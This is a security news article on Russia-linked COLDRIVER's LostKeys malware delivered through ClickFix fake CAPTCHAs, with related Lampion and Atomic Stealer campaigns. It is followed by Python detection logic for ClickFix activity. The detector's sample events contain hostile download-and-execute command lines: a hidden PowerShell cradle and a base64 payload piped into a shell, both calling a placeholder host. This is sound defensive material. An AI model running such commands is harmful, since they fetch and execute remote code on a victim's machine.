InsighthubNews
Russian hackers deploying new LostKeys malware using ClickFix fake CAPTCHA

May 8, 2025

A Russia-linked threat actor known as COLDRIVER has been observed distributing new malware called LostKeys as part of an espionage-focused campaign that uses social engineering lures such as ClickFix.

“LostKeys can steal files from hardcoded lists of extensions and directories, and can send system information and running processes to attackers.”

The malware was observed in January, March and April 2025 in attacks targeting current and former advisors to Western governments and militaries, as well as journalists, think tanks and NGOs, according to Google. Individuals connected to Ukraine were also singled out.

LostKeys is the second custom malware attributed to COLDRIVER after SPICA, marking a continued departure from the credential-phishing campaigns the threat actor is known for. The hacking group is also tracked under the names Callisto, Star Blizzard, and UNC4057.

“They are known to steal credentials, and after accessing the target account, they remove emails and steal contact lists from the compromised account,” said security researcher Wesley Shields. “In select cases, COLDRIVER may attempt to distribute malware to the target device and access files on the system.”

The latest series of attacks starts with a decoy website that presents a fake CAPTCHA verification prompt. In a widely used social engineering technique called ClickFix, the page copies a PowerShell command to the clipboard and instructs victims to open the Windows Run dialog, paste the command and run it.

The PowerShell command downloads and runs the next-stage payload from a remote server (“165.227.148(.)68”). That payload acts as a three-stage downloader and first performs checks intended to avoid running on virtual machines.

The third-stage payload, a base64-encoded blob, is decoded into a PowerShell script that runs LostKeys on the compromised host, allowing the threat actors to collect files from a hardcoded list of extensions and directories and to gather system information and the list of running processes.

The malware is assessed to be deployed selectively, as in the case of SPICA, which demonstrates the highly targeted nature of these attacks.

Google also said it had discovered additional LostKeys artifacts dating back to December 2023 that spoof a binary related to the Maltego open source research platform. It is unclear whether these samples are connected to COLDRIVER or whether the malware was repurposed by the threat actor from January 2025 onward.

ClickFix adoption continues to grow

The development comes as ClickFix continues to be steadily adopted by multiple threat actors to distribute a wide range of malware families, including a banking trojan called Lampion and the macOS information stealer Atomic Stealer.

According to Palo Alto Networks Unit 42, attacks spreading Lampion use phishing emails with ZIP file attachments as lures. An HTML file inside the ZIP archive redirects message recipients to a fake landing page that uses ClickFix instructions to launch the multi-stage infection process.

“Another interesting aspect of Lampion’s infection chain is that it is divided into several non-continuous stages that are carried out as separate processes,” Unit 42 said. “This distributed execution complicates detection because the attack flow does not form a process tree that is easily identifiable. Instead, it consists of a complex chain of individual events, some of which may appear benign on their own.”

The malicious campaign targets Portuguese-speaking individuals and organizations across a variety of sectors, including government, finance and transportation.

In recent months, the ClickFix strategy has also been combined with another underhanded tactic called EtherHiding, which uses Binance Smart Chain (BSC) contracts to hide the next-stage payload, ultimately leading to the delivery of a macOS information stealer called Atomic Stealer.

Clicking “I’m Not a Robot” triggers a Binance smart contract that, using EtherHiding techniques, delivers a base64-encoded command to the clipboard. The user is then prompted to run it in the Terminal via a macOS-specific shortcut sequence (⌘+Space, ⌘+V). “This command downloads a script that retrieves and executes a signed Mach-O binary confirmed as Atomic Stealer.”

Further investigation has shown that the campaign likely compromised around 2,800 legitimate websites to serve the fake CAPTCHA prompts. The large-scale watering hole attack has been named MacReaper by researchers.

“This attack will maximize infection by leveraging unforeseen JavaScript, three full-screen iframes and a blockchain-based command infrastructure,” the researchers added.
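As an added illustration of the two ClickFix execution chains described in this article (a pasted PowerShell download cradle launched from the Windows Run dialog, and a base64-encoded command pasted into Terminal on macOS), the following Python detection logic is not from the article or from Google's or Unit 42's reports. It classifies constructed process-creation events; the process names, regular expressions and the documentation-range IP 203.0.113.10 are assumptions.

```python
import base64
import re
from typing import List, NamedTuple

class ProcEvent(NamedTuple):
    parent: str   # parent process image
    image: str    # child process image
    cmdline: str  # child command line

# Download-cradle verbs typically present in the pasted command (Windows and macOS variants).
CRADLE = re.compile(r"\b(iex|invoke-expression|iwr|invoke-webrequest|downloadstring|curl|wget)\b", re.I)
HIDDEN = re.compile(r"-w(?:indowstyle)?\s+hidden", re.I)
# macOS ClickFix: a base64 blob decoded in place and piped straight into a shell.
B64_PIPE = re.compile(r"base64\s+(?:-d|-D|--decode)\s*\|\s*(?:sh|bash|zsh)\b", re.I)
B64_BLOB = re.compile(r"[A-Za-z0-9+/]{40,}={0,2}")
RUN_DIALOG_CHILDREN = {"powershell.exe", "pwsh.exe", "cmd.exe", "mshta.exe"}

def decoded_blobs(cmdline: str) -> List[str]:
    # Best-effort decode of long base64 runs so the cradle check can see through them.
    out = []
    for blob in B64_BLOB.findall(cmdline):
        try:
            out.append(base64.b64decode(blob, validate=True).decode("utf-8", "ignore"))
        except ValueError:  # not valid base64 after all
            pass
    return out

def classify(ev: ProcEvent) -> List[str]:
    # Returns the reasons an event looks like ClickFix execution; an empty list means benign.
    reasons = []
    # Win+R runs the pasted command as a child of explorer.exe, an odd parent for a scripting host.
    if ev.parent.lower() == "explorer.exe" and ev.image.lower() in RUN_DIALOG_CHILDREN:
        if CRADLE.search(ev.cmdline):
            reasons.append("windows: interpreter launched from Run dialog with download cradle")
        if HIDDEN.search(ev.cmdline):
            reasons.append("windows: hidden window requested")
    if B64_PIPE.search(ev.cmdline):
        reasons.append("macos: base64 decoded and piped into a shell")
    for text in decoded_blobs(ev.cmdline):
        if CRADLE.search(text):
            reasons.append("decoded base64 contains a download cradle")
    return reasons

# Constructed sample events; 203.0.113.10 is a documentation-range placeholder, not the article's IP.
SAMPLE_EVENTS = [
    ProcEvent("explorer.exe", "powershell.exe", 'powershell -w hidden -c "iex (iwr http://203.0.113.10/stage1)"'),
    ProcEvent("explorer.exe", "notepad.exe", r"notepad.exe C:\notes.txt"),
    ProcEvent("Terminal", "bash", "echo %s | base64 -d | sh" % base64.b64encode(b"curl -s http://203.0.113.10/x.sh | sh").decode()),
    ProcEvent("services.exe", "powershell.exe", r"powershell -File C:\ops\backup.ps1"),
]
```

Running `classify` over `SAMPLE_EVENTS` flags only the first and third events; the scheduled backup script and the Run-dialog launch of Notepad produce no reasons.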
